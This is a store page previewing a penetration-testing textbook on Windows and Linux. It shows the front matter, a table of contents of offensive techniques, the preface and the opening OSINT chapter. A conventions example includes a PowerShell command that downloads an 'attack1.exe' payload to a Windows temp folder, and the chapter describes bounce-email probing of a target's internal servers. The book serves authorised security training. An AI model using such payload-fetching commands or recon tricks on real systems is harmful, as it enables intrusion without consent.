Windows and Linux Penetration Testing from Scratch - Phil Bramwell - E-Book

Windows and Linux Penetration Testing from Scratch E-Book

Phil Bramwell

0,0
33,59 €

-100%
Sammeln Sie Punkte in unserem Gutscheinprogramm und kaufen Sie E-Books und Hörbücher mit bis zu 100% Rabatt.
Mehr erfahren.
Beschreibung

Let’s be honest—security testing can get repetitive. If you’re ready to break out of the routine and embrace the art of penetration testing, this book will help you to distinguish yourself to your clients.
This pen testing book is your guide to learning advanced techniques to attack Windows and Linux environments from the indispensable platform, Kali Linux. You'll work through core network hacking concepts and advanced exploitation techniques that leverage both technical and human factors to maximize success. You’ll also explore how to leverage public resources to learn more about your target, discover potential targets, analyze them, and gain a foothold using a variety of exploitation techniques while dodging defenses like antivirus and firewalls. The book focuses on leveraging target resources, such as PowerShell, to execute powerful and difficult-to-detect attacks. Along the way, you’ll enjoy reading about how these methods work so that you walk away with the necessary knowledge to explain your findings to clients from all backgrounds. Wrapping up with post-exploitation strategies, you’ll be able to go deeper and keep your access.
By the end of this book, you'll be well-versed in identifying vulnerabilities within your clients’ environments and providing the necessary insight for proper remediation.

Das E-Book können Sie in Legimi-Apps oder einer beliebigen App lesen, die das folgende Format unterstützen:

EPUB
MOBI

Seitenzahl: 608

Veröffentlichungsjahr: 2022

Bewertungen
0,0
0
0
0
0
0
Mehr Informationen
Mehr Informationen
Legimi prüft nicht, ob Rezensionen von Nutzern stammen, die den betreffenden Titel tatsächlich gekauft oder gelesen/gehört haben. Wir entfernen aber gefälschte Rezensionen.



Windows and Linux Penetration Testing from Scratch

Second Edition

Harness the power of pen testing with Kali Linux for unbeatable hard-hitting results

Phil Bramwell

BIRMINGHAM—MUMBAI

Windows and Linux Penetration Testing from Scratch

Second Edition

Copyright © 2022 Packt Publishing

All rights reserved. No part of this book may be reproduced, stored in a retrieval system, or transmitted in any form or by any means, without the prior written permission of the publisher, except in the case of brief quotations embedded in critical articles or reviews.

Every effort has been made in the preparation of this book to ensure the accuracy of the information presented. However, the information contained in this book is sold without warranty, either express or implied. Neither the author, nor Packt Publishing or its dealers and distributors, will be held liable for any damages caused or alleged to have been caused directly or indirectly by this book.

Packt Publishing has endeavored to provide trademark information about all of the companies and products mentioned in this book by the appropriate use of capitals. However, Packt Publishing cannot guarantee the accuracy of this information.

Group Product Manager: Vijin Boricha

Publishing Product Manager: Vijin Boricha

Senior Editor: Arun Nadar

Content Development Editor: Sujata Tripathi

Technical Editor: Nithik Cheruvakodan

Copy Editor: Safis Editing

Project Coordinator: Ashwin Dinesh Kharwa

Proofreader: Safis Editing

Indexer: Sejal Dsilva

Production Designer: Vijay Kamble

Senior Marketing Coordinator: Hemangi Lotlikar

First published: July 2018

Second edition: September 2022

Production reference: 1030822

Published by Packt Publishing Ltd.

Livery Place

35 Livery Street

Birmingham

B3 2PB, UK.

ISBN 978-1-80181-512-3

www.packt.com

Посвящается Соне, Ленне, Саше и моим детям Вере и Натану. Ваша непоколебимая поддержка – единственная причина, по которой это стало возможным.

For Mom, Dad, Rich, and Alex, who all somehow found a way to tolerate me all of these years.

And for every colleague along the way, from Kalamazoo to San Luis Obispo to NYC to Jerusalem and back – you kept me smiling and challenged me to keep this adventure going. Thank you.

Contributors

About the author

Phil Bramwell, CISSP has been tinkering with gadgets since he was a kid in the 1980s. After obtaining the Certified Ethical Hacker and Certified Expert Penetration Tester certifications in 2004 and a Bachelor of Applied Science in computer and information security from Davenport University in 2007, Phil was a security engineer and consultant who conducted Common Criteria, FIPS, and PCI-DSS assessments, GDPR consulting for a firm in the UK, and social engineering and penetration testing for banks, governments, and universities throughout the US. After specializing in antimalware analysis and cybersecurity operations, Phil is now a penetration tester for a Fortune 100 automobile manufacturer. Phil is based in the Metro Detroit area.

About the reviewer

Paolo Stagno (aka VoidSec) has worked as a penetration tester for a wide range of clients across top-tier international banks, major tech companies, and various Fortune 1000 industries. He has been responsible for discovering and exploiting new unknown vulnerabilities in applications, network infrastructure components, IoT devices, protocols, and technologies of multiple vendors and tech giants. He is now a freelance vulnerability researcher and exploit developer focused on Windows offensive application security (kernel and user-land). He enjoys understanding the digital world we live in by disassembling, reverse engineering, and exploiting complex products and code.

To my partner, Chiara, “my early muir owl,” for her continued support and encouragement with everything that I do. You have always pushed me towards new adventures, accomplishing my goals, and doing what is right; I love you.

Table of Contents

Preface

Who this book is for

What this book covers

To get the most out of this book

Download the color images

Conventions used

Get in touch

Share Your Thoughts

Part 1: Recon and Exploitation

Chapter 1: Open Source Intelligence

Technical requirements

Hiding in plain sight – OSINT and passive recon

Walking right in – what the target intends to show the world

Just browsing, thanks – stepping into the target’s environment

I know a guy – services doing the probing for you

The world of Shodan

Shodan search filters

Google’s dark side

Google’s advanced operators

The Advanced Search page

Thinking like a dark Googler

Diving into OSINT with Kali

The OSINT analysis tools folder

Transforming your perspective – Maltego

Entities and transforms and graphs, oh my

OSINT with Spiderfoot

Summary

Questions

Chapter 2: Bypassing Network Access Control

Technical requirements

Bypassing media access control filtering – considerations for the physical assessor

Configuring a Kali wireless access point to bypass MAC filtering

Design weaknesses – exploiting weak authentication mechanisms

Capturing captive portal authentication conversations in the clear

Layer-2 attacks against the network

Bypassing validation checks

Confirming the organizationally unique identifier

Passive operating system fingerprinter

Spoofing the HTTP user agent

Breaking out of jail – masquerading the stack

Following the rules spoils the fun – suppressing normal TCP replies

Fabricating the handshake with Scapy and Python

Summary

Questions

Further reading

Chapter 3: Sniffing and Spoofing

Technical requirements

Advanced Wireshark – going beyond simple captures

Passive wireless analysis

Targeting WLANs with the Aircrack-ng suite

WLAN analysis with Wireshark

Active network analysis with Wireshark

Advanced Ettercap – the man-in-the-middle Swiss Army Knife

Bridged sniffing and the malicious access point

Ettercap filters – fine-tuning your analysis

Getting better – scanning, sniffing, and spoofing with BetterCAP

Summary

Questions

Further reading

Chapter 4: Windows Passwords on the Network

Technical requirements

Understanding Windows passwords

A crash course on hash algorithms

Password hashing methods in Windows

If it ends with 1404EE, then it’s easy for me – understanding LM hash flaws

Authenticating over the network – a different game altogether

Capturing Windows passwords on the network

A real-world pen test scenario – the chatty printer

Configuring our SMB listener

Authentication capture

Hash capture with LLMNR/NetBIOS NS spoofing

Let it rip – cracking Windows hashes

The two philosophies of password cracking

John the Ripper cracking with a wordlist

John the Ripper cracking with masking

Reviewing your progress with the show flag

Here, kitty kitty – getting started with Hashcat

Summary

Questions

Further reading

Chapter 5: Assessing Network Security

Technical requirements

Network probing with Nmap

Host discovery

Port scanning – scan types

Port scanning – port states

Firewall/IDS evasion, spoofing, and performance

Service and OS detection

Hands-on with Nmap

Integrating Nmap with Metasploit Console

Exploring binary injection with BetterCAP

The magic of download hijacking

Smuggling data – dodging firewalls with HTTPTunnel

IPv6 for hackers

IPv6 addressing basics

Watch me neigh neigh – local IPv6 recon and the Neighbor Discovery Protocol

IPv6 man-in-the-middle – attacking your neighbors

Living in an IPv4 world – creating a local 4-to-6 proxy for your tools

Summary

Questions

Further reading

Chapter 6: Cryptography and the Penetration Tester

Technical requirements

Flipping the bit – integrity attacks against CBC algorithms

Block ciphers and modes of operation

Introducing block chaining

Setting up your bit-flipping lab

Manipulating the IV to generate predictable results

Flipping to root – privilege escalation via CBC bit-flipping

Sneaking your data in – hash length extension attacks

Setting up your hash attack lab

Understanding SHA-1’s running state and compression function

Data injection with the hash length extension attack

Busting the padding oracle with PadBuster

Interrogating the padding oracle

Decrypting a CBC block with PadBuster

Behind the scenes of the oracle padding attack

Summary

Questions

Chapter 7: Advanced Exploitation with Metasploit

Technical requirements

How to get it right the first time – generating payloads

Installing Wine32 and Shellter

Payload generation goes solo – working with msfvenom

Creating nested payloads

Helter skelter – evading antivirus with Shellter

Modules – the bread and butter of Metasploit

Building a simple Metasploit auxiliary module

Efficiency and attack organization with Armitage

Getting familiar with your Armitage environment

Enumeration with Armitage

Exploitation made ridiculously simple with Armitage

A word about Armitage and the pen tester mentality

Social engineering attacks with Metasploit payloads

Creating a Trojan with Shellter

Preparing a malicious USB drive for Trojan delivery

Summary

Questions

Further reading

Part 2: Vulnerability Fundamentals

Chapter 8: Python Fundamentals

Technical requirements

Incorporating Python into your work

Why Python?

Getting cozy with Python in your Kali environment

Introducing Vim with Python syntax awareness

Network analysis with Python modules

Python modules for networking

Building a Python client

Building a Python server

Building a Python reverse-shell script

Antimalware evasion in Python

Creating Windows executables of your Python scripts

Preparing your raw payload

Writing your payload retrieval and delivery in Python

Python and Scapy – a classy pair

Revisiting ARP poisoning with Python and Scapy

Summary

Questions

Further reading

Chapter 9: PowerShell Fundamentals

Technical requirements

Power to the shell – PowerShell fundamentals

What is PowerShell?

PowerShell’s cmdlets and the PowerShell scripting language

Working with the Windows Registry

Pipelines and loops in PowerShell

It gets better – PowerShell’s ISE

Post-exploitation with PowerShell

ICMP enumeration from a pivot point with PowerShell

PowerShell as a TCP-connect port scanner

Delivering a Trojan to your target via PowerShell

Encoding and decoding binaries in PowerShell

Offensive PowerShell – introducing the Empire framework

Installing and introducing PowerShell Empire

Configuring listeners

Configuring stagers

Your inside guy – working with agents

Configuring a module for agent tasking

Summary

Questions

Further reading

Chapter 10: Shellcoding - The Stack

Technical requirements

An introduction to debugging

Understanding the stack

Understanding registers

Assembly language basics

Disassemblers, debuggers, and decompilers – oh my!

Getting cozy with the Linux command-line debugger – GDB

Stack smack – introducing buffer overflows

Examining the stack and registers during execution

Lilliputian concerns – understanding endianness 

Introducing shellcoding

Hunting bytes that break shellcode

Generating shellcode with msfvenom

Grab your mittens, we’re going NOP sledding

Summary

Questions

Further reading

Chapter 11: Shellcoding – Bypassing Protections

Technical requirements

DEP and ASLR – the intentional and the unavoidable

Understanding DEP

Understanding ASLR

Demonstrating ASLR on Kali Linux with C

Introducing ROP

Borrowing chunks and returning to libc – turning the code against itself

The basic unit of ROP – gadgets

Getting cozy with our tools – MSFrop and ROPgadget

Creating our vulnerable C program without disabling the protections

No PIE for you – compiling your vulnerable executable without ASLR hardening

Generating an ROP chain

Getting hands-on with the return-to-PLT attack

Extracting gadget information for building your payload

Go, go, gadget ROP chain – bringing it together for the exploit

Summary

Questions

Further reading

Chapter 12: Shellcoding – Evading Antivirus

Technical requirements

Living off the land with PowerShell

Injecting Shellcode into interpreter memory

Getting sassy – on-the-fly LSASS memory dumping with PowerShell

Staying flexible – tweaking the scripts

Understanding Metasploit shellcode delivery

Encoder theory and techniques – what encoding is and isn’t

Windows binary disassembly within Kali

Injection with Backdoor Factory

Time travel with your Python installation – using PyEnv

Installing BDF

Code injection fundamentals – fine-tuning with BDF

Trojan engineering with BDF and IDA

Summary

Questions

Chapter 13: Windows Kernel Security

Technical requirements

Kernel fundamentals – understanding how kernel attacks work

Kernel attack vectors

The kernel’s role as a time cop

It’s just a program

Pointing out the problem – pointer issues

Dereferencing pointers in C and assembly

Understanding NULL pointer dereferencing

The Win32k kernel-mode driver

Passing an error code as a pointer to xxxSendMessage()

Metasploit – exploring a Windows kernel exploit module

Practical kernel attacks with Kali

An introduction to privilege escalation

Escalating to SYSTEM on Windows 7 with Metasploit

Summary

Questions

Further reading

Chapter 14: Fuzzing Techniques

Technical requirements

Network fuzzing – mutation fuzzing with Taof proxying

Configuring the Taof proxy to target the remote service

Fuzzing by proxy – generating legitimate traffic

Hands-on fuzzing with Kali and Python

Picking up where Taof left off with Python – fuzzing the vulnerable FTP server

Exploring with boofuzz

Impress your teachers – using boofuzz grammar

The other side – fuzzing a vulnerable FTP client

Writing a bare-bones FTP fuzzer service in Python

Crashing the target with the Python fuzzer

Fuzzy registers – the low-level perspective

Calculating the EIP offset with the Metasploit toolset

Shellcode algebra – turning the fuzzing data into an exploit

Summary

Questions

Further reading

Part 3: Post-Exploitation

Chapter 15: Going Beyond the Foothold

Technical requirements

Gathering goodies – enumeration with post modules

ARP enumeration with Meterpreter

Forensic analysis with Meterpreter – stealing deleted files

Internet Explorer enumeration – discovering internal web resources

Network pivoting with Metasploit

Just a quick review of subnetting

Launching Metasploit into the hidden network with autoroute

Escalating your pivot – passing attacks down the line

Using your captured goodies

Quit stalling and Pass-the-Hash – exploiting password equivalents in Windows

Summary

Questions

Further reading

Chapter 16: Escalating Privileges

Technical requirements

Climbing the ladder with Armitage

Named pipes and security contexts

Impersonating the security context of a pipe client

Superfluous pipes and pipe creation race conditions

Moving past the foothold with Armitage

Armitage pivoting

When the easy way fails – local exploits

Kernel pool overflow and the danger of data types

Let’s get lazy – Schlamperei privilege escalation on Windows 7

Escalation with WMIC and PS Empire

Quietly spawning processes with WMIC

Creating a PowerShell Empire agent with remote WMIC

Escalating your agent to SYSTEM via access token theft

Dancing in the shadows – looting domain controllers with vssadmin

Extracting the NTDS database and SYSTEM hive from a shadow copy

Exfiltration across the network with cifs

Password hash extraction with libesedb and ntdsxtract

Summary

Questions

Further reading

Chapter 17: Maintaining Access

Technical requirements

Persistence with Metasploit and PowerShell Empire

Creating a payload for the Metasploit persister

Configuring the Metasploit persistence module and firing away

Verifying your persistent Meterpreter backdoor

Not to be outdone – persistence in PowerShell Empire

Elevating the security context of our Empire agent

Creating a WMI subscription for stealthy persistence of your agent

Verifying agent persistence

Hack tunnels – netcat backdoors on the fly

Uploading and configuring persistent netcat with Meterpreter

Remotely tweaking Windows Firewall to allow inbound netcat connections

Verifying persistence is established

Maintaining access with PowerSploit

Installing the persistence module in PowerShell

Configuring and executing Meterpreter persistence

Lying in wait – verifying persistence

Summary

Questions

Further reading

Answers

Other Books You May Enjoy

Preface

Maybe you’ve just finished a boot camp on ethical hacking and you can’t get enough. Perhaps you’re an administrator who has realized that it’s time to understand how the bad guys work with these dark arts. It’s also possible that someone gave you this book for your birthday after misunderstanding when you said you have a keen interest in den nesting. Whoever you are (except for that last one), this book is for you. But why this book?

Let’s be honest: this subject has a tendency to be dry. Sometimes, it feels like an author is there to just tell us how it is, providing a sparse foundation of the concepts under discussion. I think the experience is more enjoyable if it feels more like an interactive learning session than a lecture. So, I’ve endeavored to discuss pen testing in a more conversational and relaxed manner. Reading this book should feel like we’re just hanging out in the lab and exploring these concepts. I think the kids these days call this vibing. I’ll have to ask my nieces.

This book isn’t intended for complete beginners, but it is accessible to different levels of experience. Overall, it is assumed that you have some experience and education in information technology and cybersecurity. This book won’t “teach you how to hack,” and in fact, many of the labs feature old attacks that aren’t likely to succeed in a real-world environment. The foundation they all provide, however, is very much still relevant. The lessons will be valuable to those who intend to understand how the core concept works, and from there, they can be translated into modern attacks. This book emphasizes understanding over blindly following steps.

Who this book is for

This book is for penetration testers, IT professionals, and individuals breaking into the pen testing role after demonstrating an advanced skill in boot camps. Prior experience with Windows, Linux, and networking is useful.

What this book covers

Chapter 1, Open Source Intelligence, provides a look at how to use publicly available resources such as Google to gather surprisingly useful information about a target.

Chapter 2, Bypassing Network Access Control, examines how network access is sometimes controlled based on how a system “appears,” and how we can tweak that appearance.

Chapter 3, Sniffing and Spoofing, explores the world of intercepting data off the wire (or out of the air) and manipulating data on the fly.

Chapter 4, Windows Passwords on the Network, reviews how Windows manages passwords during authentication over the network and how to intercept these attempts.

Chapter 5, Assessing Network Security, provides a crash course in network analysis and vulnerability assessment with Nmap, further covering intercepting data to inject our own in its place, and providing a review of IPv6 in today’s still-IPv4-dominant world.

Chapter 6, Cryptography and the Penetration Tester, looks at attacks that exploit weaknesses in cryptographic implementations.

Chapter 7, Advanced Exploitation with Metasploit, dives into the inner workings of Metasploit, as well as how to use Metasploit-generated payloads with other excellent tools, such as Shellter.

Chapter 8, Python Fundamentals, provides a crash course in Python from a pen tester’s perspective. This foundation is useful later in the book.

Chapter 9, PowerShell Fundamentals, also provides a crash course in a scripting language: PowerShell. This foundation is also useful in later labs.

Chapter 10, Shellcoding – The Stack, provides a review of how the stack works and how it can be manipulated.

Chapter 11, Shellcoding – Bypassing Protections, jumping off from the stack foundation in Chapter 10, Shellcoding – The Stack, explores how defenders have responded and how attacks such as return-oriented programming had to adapt to these responses.

Chapter 12, Shellcoding – Evading Antivirus, explores how antimalware can be confused when we live off the land with PowerShell, and an alternative to Shellter’s dynamic injection approach: cave jumping.

Chapter 13, Windows Kernel Security, provides a foundation in how kernel weaknesses are found and an exploration of real-world examples.

Chapter 14, Fuzzing Techniques, provides a practical review of the fuzzing methodology and how to inform exploit development with the results.

Chapter 15, Going Beyond the Foothold, looks at the first steps after we finally establish our initial foothold in our target, including how to conduct recon and further attacks from that privileged position.

Chapter 16, Escalating Privileges, provides a more in-depth look at how we can escalate privileges locally with Metasploit, as well as finding and using passwords – even when we don’t know what the password is.

Chapter 17, Maintaining Access, takes a look at how we can persist once we’ve made it inside the target environment, both from scratch with the target’s built-in abilities and with specialized tools for building reboot-resistant access.

Answers can be used to check your knowledge by providing the answers to the quizzes at the end of each chapter.

To get the most out of this book

The intent of this book is to emphasize Kali’s off-the-shelf capabilities as much as possible. Many commercial products are not mentioned, or if they are mentioned, free alternatives are reviewed in the labs (e.g., the free version of Shellter versus Shellter Pro). Today’s professional penetration tester has a wealth of excellent commercial tools in their toolset, but you can be an effective pen tester with what’s already freely available. Per The Hacker Manifesto, this was our intention with these discussions.

The version of Kali Linux used in this book is 2021.1; however, closer to the publishing date, I reviewed the labs with 2022.1 and found no issues. The processor and stack discussions assume a 32-bit operating system.

Kali Linux is free to download. However, Windows is a paid operating system. Thankfully, Microsoft provides evaluation copies of Windows Server and Edge developer copies of Windows 7 and 10; these were used as Windows targets in the labs.

The virtualization used was VMware Workstation, which is paid software. You can build comparable environments with the freeware Oracle VirtualBox.

The evaluation copy of Windows Server can be downloaded from https://www.microsoft.com/en-us/evalcenter/download-windows-server-2016.

The developer copies of Windows 7 or 10 can be downloaded from https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/.

Download the color images

We also provide a PDF file that has color images of the screenshots and diagrams used in this book. You can download it here: https://packt.link/7UGEZ.

Conventions used

There are a number of text conventions used throughout this book.

Code in text: Indicates code words in text, database table names, folder names, filenames, file extensions, pathnames, dummy URLs, user input, and Twitter handles. Here is an example: “You can also use from [module] import to pick and choose the attributes you need.”

A block of code is set as follows:

11000000.10101000.01101001.00000000          Network           Hosts

When we wish to draw your attention to a particular part of a code block, the relevant lines or items are set in bold:

11111111.11111111.11100000.00000000   255     255      224       0

Any command-line input or output is written as follows:

> (New-Object System.Net.WebClient).DownloadFile(“http://192.168.63.143/attack1.exe”, “c:\windows\temp\attack1.exe”)

Bold: Indicates a new term, an important word, or words that you see onscreen. For instance, words in menus or dialog boxes appear in bold. Here is an example: “Navigate to Hosts | Nmap Scan | Quick Scan (OS detect).”

Tips or Important Notes

Appear like this.

Get in touch

Feedback from our readers is always welcome.

General feedback: If you have questions about any aspect of this book, email us at [email protected] and mention the book title in the subject of your message.

Errata: Although we have taken every care to ensure the accuracy of our content, mistakes do happen. If you have found a mistake in this book, we would be grateful if you would report this to us. Please visit www.packtpub.com/support/errata and fill in the form.

Piracy: If you come across any illegal copies of our works in any form on the internet, we would be grateful if you would provide us with the location address or website name. Please contact us at [email protected] with a link to the material.

If you are interested in becoming an author: If there is a topic that you have expertise in and you are interested in either writing or contributing to a book, please visit authors.packtpub.com.

Share Your Thoughts

Once you’ve read Windows and Linux Penetration Testing from Scratch, we’d love to hear your thoughts! Please click here to go straight to the Amazon review page for this book and share your feedback.

Your review is important to us and the tech community and will help us make sure we’re delivering excellent quality content.

Part 1: Recon and Exploitation

In this section, we will first explore open source intelligence (OSINT) concepts. We’ll then move on to networking. By the end of this section, you will be able to conduct sophisticated spoofing and footprinting techniques to understand the network and thus inform efforts to exploit targets.

This part of the book comprises the following chapters:

Chapter 1, Open Source IntelligenceChapter 2, Bypassing Network Access ControlChapter 3, Sniffing and SpoofingChapter 4, Windows Passwords on the NetworkChapter 5, Assessing Network SecurityChapter 6, Cryptography and the Penetration TesterChapter 7, Advanced Exploitation with Metasploit

Chapter 1: Open Source Intelligence

What separates penetration testing (pen testing) from hacking of the illegal variety? The simple answer is permission, but how do you define this? Asking for a pen test does not mean an open invitation to hack to your heart’s content. I know of at least one pen testing organization that found itself in legal trouble for touching a server that was not supposed to be part of the test. This is part of the scope of the pen test, and it is defined in the planning phase of the engagement. Its importance can’t be overstated. However, this is a hands-on technical book – we won’t be covering scoping and engagement letters here.

Now, you’re double-checking the name of the chapter to make sure you’re in the right place. Is this not about open source intel, you wonder? Indeed, it is, and I mention scope because open source intelligence (OSINT) is an area where you need not worry about the frustration of a skinny scope. Open source means the information is already out in the open, ready for your retrieval. You only need to know the tips and tricks needed to step beyond the run-of-the-mill Google user. In this chapter, we’ll define OSINT more carefully – we’ll learn how to take advantage of Google’s sophisticated features to dig deep enough to surprise your client before you’ve sent a single packet to their network, and we’ll introduce how Kali functions as your OSINT sidekick. We’ll cover this and more in the following topics:

Hiding in plain sight – OSINT and passive reconThe world of ShodanGoogle’s dark sideDiving into OSINT with Kali

Technical requirements

You’ll need a virtual machine (VM) or standalone PC running KaliLinux. We’ll run our demonstrations on Kali2021.1, but the first section can be completed on any internet-connected computer.

Hiding in plain sight – OSINT and passive recon

We’ll be making heavy use of Kali Linux throughout this book, but some of the most important work you’ll do for many clients can be done from any device, regardless of a specialized toolset. You might be waiting in line at Starbucks with your personal smartphone, punching in some slick Google queries, and bam – you have a surprising head start before you’ve even arrived at your desk. Then, you sit down at Kali and spend half an hour digging up even more, and you haven’t sent a single packet across the wire to your target. But now, I can hear you at the back: You've said "OSINT" and "passive recon" — is there a difference? That’s a good question, with an annoying answer: It depends on whom you ask. These terms are often used synonymously, but the important distinction is where you’re sending your packets:

With pure passive reconnaissance, your packets are going to a myriad of resources that are available on the public internet to anyone willing to ask. But they are not going to your target’s network. This can also mean that you aren’t sending any packets at all – you’re merely listening, as we do with wardriving.OSINT can mean both this purely passive task where no contact is made with your target and using your target’s resources that are explicitly meant for public use. Does your target allow a potential customer to create a free account? It behooves the pen tester to create an account as a potential customer would, but this probably means you’re directly communicating with your target’s network. The “meant for public use” part is what makes it OSINT.

Sounds like a pretty important distinction, right? The reason why they’re often treated as the same thing is that they both fall under the umbrella of a black box – our experience with the environment is like an ordinary outsider, as opposed to a white box, where, as pen testers, we fully understand the inner workings of the environment and we’re informing our efforts accordingly (of course, we can conduct our testing with only partial knowledge of the environment, which will be a blend of black and white, or a gray box). We’re touching on pen testing philosophy at this point – how realistic is the test in representing a real-world potential attack? For those of us passionate about security, we stand by Shannon's Maxim. That is, we should always assume that the enemy will have full knowledge of how our system works. A real-world enemy will have scoured the internet for any tidbits about their target. A real-world enemy will have created accounts with the target’s services and spent a considerable amount of time gaining the same level of familiarity as any old hand. This being said, your client may need to understand how their environment works from different perspectives, and you might very well be prohibited from using information gained from the view of a registered user. Another consideration is time – you will be operating on a schedule, and you don’t want to put the other phases of the assessment in a crunch.

Walking right in – what the target intends to show the world

The nature of your target will tell you how much is meant to be shown to the world. For example, if your target is a bank, then they will provide comprehensive resources for both their current customers and in their efforts to attract new account holders. Even a more private entity needs to put themselves out there in some regard (for example, a private network that needs to be remotely accessed). There’s an old saying in computer security: the most secure computer is sealed in a concrete box and sits on the ocean floor. If no one can actually use the computer, it seems like a waste of concrete, and so our clients will host services and websites anyway.

Examining the target’s websites

One of the first things I do with a target is browse their website and View page source. This screenshot shows how to grab it in MicrosoftEdge, but right-clicking on a page will bring up the option in any of the major browsers:

Figure 1.1 – The right-click menu while viewing a page in Microsoft Edge

This option will open a new tab and display the HTML source for the page. Often, this won’t reveal anything that isn’t already visible (it is a markup language, after all). But there may be comments in the source and other treats not intended to be displayed by the browser, and these can give us morsels of information about our target that will inform our attack.

With this client, the page source revealed a folder called assets:

Figure 1.2 – Examining the page source in Microsoft Edge

We see references to scripts that can be found on the host under the assets folder. So, just drop this into your address bar and see what happens – http://www.your-client.com/assets:

Figure 1.3 – The result of manually typing in the assets URL

We haven’t even done anything yet – just pulled up the public site in an ordinary browser – but we see this host is telling us a couple of things:

It’s an Apache server, version 2.4.41, running on Unix (or Unix-like).It wasn’t configured in the most secure manner.

That second point is the most important observation. Does revealing the server version like this really matter that much? Sure, it gives us a heads-up for our research, but it’s not exactly a welcome mat either. What it tells us about is the administrator’s general approach to operational security. The kind of server administrator who either doesn’t know or doesn’t care about the risk, regardless of how tiny, is more likely to be the kind of administrator who, for example, asks people in public forums for help with some new hardware at work, even providing logs that you’d be lucky to get during the assessment.

Don’t be so antisocial – examining the target’s presence on social media

We live in funny times, when it seems like everyone and their grandparents are willingly sharing all their personal details with social media companies. Back in my day, you’d hear about the cool kids having a party at their parents’ house and you’d think, now that's the place to be on Friday night. Your target is hearing the same thing about social media today – everyone’s on Facebook, Twitter, Instagram, and TikTok, so that’s where you’re going to meet the cool kids (or potential customers, as the case may be). In this screenshot, we see how our target is encouraging engagement:

Figure 1.4 – Social media links on our target’s home page

You’re not likely to find juicy tidbits about your target from posts that they made on social media. You’re likely to find the good stuff from other users of the social media platform in question. For example, you click the Facebook button and end up on a page set up by your target. You browse the comments: Jane is the GM at the Highland branch and she was really responsive to my needs. Or maybe a photo from a company picnic with 14 likes, and one of the likes is Jane’s, and she loves to share pictures of her pets, kids, car, home, and her favorite latte at Starbucks over on her profile page.

I probably sound like a ranting lunatic (I am, but that’s not important right now), but the point is to soak up all of this information and take good notes. We’re in the first chapter of the book, discussing what will probably be chapter one of your assessment with a client. That Jane names her dog Mr. Scruffles might seem useless, until day four, when you’re prompted with the security question for pet's name. Also consider that Jane’s IT guy, Dave, is a member of a popular Facebook group for IT admins to vent about their jobs; Dave just had a hard day working with your Cisco appliances and he’s ready to upload a diagnostic file.

Tread carefully!

We’re looking for information that’s already there. Do not attempt to communicate with any of the individuals you find during your social media searches, unless you’re conducting a social engineering assessment – this would most certainly not be passive!

Just browsing, thanks – stepping into the target’s environment

Wait a sec. Stepping into the target’s environment? Now I know I'm in the wrong chapter, you think. Indeed, this is where passive recon starts to blend into the broader term OSINT. The keyword so far has been passive – listening from the sidelines or taking a peek in the proverbial windows as we drive by. Now, the keywords are open source – we’re taking a look at things that are meant to be out in the open. We’re going to start getting a little braver with our efforts. Instead of figuratively driving by, we’ll park and walk into the shop and look around. It’s a door for the public and it says Open on the front, so we haven’t stepped outside the realm of open source. Sometimes, however, we can get interesting information about what’s going on behind the counter of our metaphorical shop.

Summoning the daemon – the fat-fingered email address

We’ve all misspelled someone’s name at some point. Perhaps you’re trying to send an email to the administrator of a domain and, gosh darn it, you misspelled administrator. Oh, these pesky fingers of mine. As my mother-in-law would say, schlimazel (an unlucky or clumsy person). Let’s take a look at our outgoing email:

Figure 1.5 – The header from our sent probe email

The point is to send an email to the target domain but to a recipient we know doesn’t exist. You could very well let your cat walk across the keyboard and use that as the recipient – the result would be the same. However, there’s a bit of a social engineering angle going on here. Just in case someone is reviewing these, my message is more likely to look like a legitimate attempt to communicate with the business or government agency. A smashed-keyboard email address and message body will look like a deliberate attempt to provoke a response. Bonus points if you actually do engage in a friendly conversation posing as a customer, but just let one of your messages have a fat-fingered recipient address. By sending an email to a nonexistent email address, we provoke a bounce message. Unlike sending an email to a nonexistent domain, only the target environment is going to know whether or not the user exists. The bounce will come from the target environment and often contains troubleshooting information with tasty tidbits for us fledgling hackers. Let’s take a peek at the non-delivery report from our client:

Figure 1.6 – The header from the bounce message

My favorite part of this bounce message is Diagnostic information for administrators. Golly, that sure is helpful of you, thank you!

I said this earlier, and it should be a mantra throughout the OSINT phase: this isn't exactly a welcome mat. It isn’t the keys to the kingdom, and this isn’t a movie – no amount of furious typing is going to change our position in the assessment. But let’s take a look at what we learned, step by step:

The server that generated this report is ME-VM-MBX02 and its IP address is 10.255.134.142. It’s reasonable to guess that this is a virtual machine, as the VM initialism is often incorporated into internal naming conventions by IT folks. It makes it easier to determine what troubleshooting may entail, at a glance.The server that passed on this information to ME-VM-MBX02, our report-generating server, is ME-VM-CAS02, and its IP addresses are 10.255.134.140 and 10.255.27.36.The server that passed this information on to the CAS02 host is ME-VM-MAILGW01 and its IP address is 10.255.134.160. GW probably means gateway.

Hopefully, you have already picked up on the important part. That’s right – those are ten-dot addresses. As a refresher, addresses in the 10.0.0.0/8 block are reserved as private address space as defined by the Internet Assigned Numbers Authority (IANA) (refer to them as ten-dot or ten slash eight and you’ll be one of the cool kids). Addresses in the 10.0.0.0/8 block are not publicly routable, so why do we care, as uninformed outsiders? We’re clearly getting information from behind the perimeter. What else did we notice? Examine this line:

Microsoft SMTP Server (TLS) id 15.0.1497.2

Let’s jump back into our trusty search engine and look for Microsoft and 15.0.1497.2. Top result? Exchange Server build numbers and release dates. Search the page for that build number and we end up with Exchange Server 2013 CU (cumulative update) 23, released on June 18, 2019. Well, I’m writing this in 2021, almost 2 years later, so it’s back to the search engine to try this: vulnerabilities and 2013 CU23. We end up finding CVE-2021-28480, CVE-2021-28481, CVE-2021-28482, and CVE-2021-28483 – remote code execution vulnerabilities. We already have an internal subnet to investigate: 10.255.0.0/16. You have to admit this isn’t too shabby when you consider that all we did was send an email. Thus, here comes yet another reminder: take good notes. Write down everything you do. Don’t skimp on the screen captures – I would sometimes record my screen while I worked.

I know a guy – services doing the probing for you

Back in my day, we had to walk 15 miles through the snow to get to the pen test. We didn’t even have computers – we used empty bean cans with a string tied between them to send and receive packets. Okay, I’m joking, but things are definitely different these days for the younglings. There’s a lot of work that can be taken out of your hands in today’s world of what I like to call EaaS: Everything-as-a-Service. This is important for pen testers because it allows you to do more with a small amount of time – you’re only with your client for a set window of time and it won’t feel like enough. You’ll be taking advantage of time-saving measures at all phases of an assessment (hello, scripting ability) but OSINT is no exception – even though we haven’t sat down with Kali yet. Let’s take a look.

Security header scanners

There are a few of these online. Try typing into a search engine security header scanners. One of the better ones is SecurityHeaderScanner.com, a service I used for this client example:

Figure 1.7 – The result from SecurityHeaderScanner.com after scanning my client

